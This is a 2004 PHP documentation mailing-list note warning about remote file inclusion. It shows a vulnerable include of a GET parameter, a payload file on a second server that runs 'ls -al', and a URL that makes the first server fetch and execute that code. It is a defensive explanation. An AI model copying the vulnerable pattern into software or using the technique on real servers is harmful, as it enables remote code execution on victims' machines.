note 42906 added to function.include
| From: | durkboekA_ThotmailD_O_Tcom at rn2 dot php dot net | Date: | Thu, 03 Jun 2004 08:09:34 +0000 |
| Subject: | note 42906 added to function.include | ||
| Groups: | php.notes | ||
| Request: | Send a blank email to php-notes+get-70760@lists.php.net to get a copy of this message | ||
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file
index.php with the following code:
<?php
// File: index.php
include ($_GET['id'].".php");
?>
This is, of course, not a very good way to program, but i actually found a program doing this.
Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the
following code:
<?php
// File: list.php
$output = "";
exec("ls -al",$output);
foreach($output as $line) {
echo $line . "<br>\n";
}
?>
If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of
files.
But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php
to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it allways worked.
This is only an example, but there have been hacks uploading files to servers etc.
So, allways be extremely carefull with remote includes.
----
Manual Page -- http://www.php.net/manual/en/function.include.php
Edit -- http://master.php.net/manage/user-notes.php?action=edit+42906
Delete -- http://master.php.net/manage/user-notes.php?action=delete+42906&report=yes
Reject -- http://master.php.net/manage/user-notes.php?action=reject+42906&report=yes
Search -- http://master.php.net/manage/user-notes.php